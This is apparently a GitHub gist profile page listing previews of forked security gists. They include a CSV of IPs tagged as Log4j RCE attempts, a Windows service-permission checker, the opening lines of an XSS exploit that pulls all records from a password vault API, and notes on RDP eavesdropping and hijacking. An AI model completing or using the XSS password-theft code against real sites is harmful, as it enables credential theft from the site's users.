Skip to content

Instantly share code, notes, and snippets.

View julio1925's full-sized avatar

#julzsec julio1925

View GitHub Profile
@julio1925
julio1925 / CVE-2021-44228_IPs.csv
Created December 12, 2021 12:05 — forked from gnremy/CVE-2021-44228_IPs.csv
CVE-2021-44228 Apache Log4j RCE Attempts Dec 12th 12:15AM ET
ip tag_name
209.141.45.227 Apache Log4j RCE Attempt
209.127.17.234 Apache Log4j RCE Attempt
197.246.171.111 Apache Log4j RCE Attempt
195.123.247.209 Apache Log4j RCE Attempt
185.107.47.215 Apache Log4j RCE Attempt
178.17.171.102 Apache Log4j RCE Attempt
150.158.189.96 Apache Log4j RCE Attempt
145.220.24.19 Apache Log4j RCE Attempt
121.5.219.20 Apache Log4j RCE Attempt
@julio1925
julio1925 / checksvc.py
Created November 18, 2018 14:09 — forked from wdormann/checksvc.py
Check for insecure services on Windows
import os
import subprocess
import ctypes
# See: https://blogs.msmvps.com/erikr/2007/09/26/set-permissions-on-a-specific-service-windows/
svcinfo = {}
nonadmin = ['AU', 'AN', 'BG', 'BU', 'DG', 'WD', 'IU', 'LG']
FNULL = open(os.devnull, 'w')
@julio1925
julio1925 / password_vault_exploit.js
Created August 21, 2018 10:46 — forked from shawarkhanethicalhacker/password_vault_exploit.js
XSS Exploit code for retrieving passwords stored in a Password Vault
//Exploit Code by Shawar Khan
var data_chunks = '';
// Capturing Records from API
fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) {
// Holds the records in as String
var allrecords = data;
// converting response to JSON
@julio1925
julio1925 / infosec_newbie.md
Created June 6, 2018 15:16 — forked from mubix/infosec_newbie.md
How to start in Infosec
RDP Eavesdropping and Hijacking
*******************************
I spent some time this evening looking at ways to eavesdrop and hijack RDP sessions. Here is a gist of (semi) interesting findings
that is not very new...
===========
Inspiration
===========
As you may already know...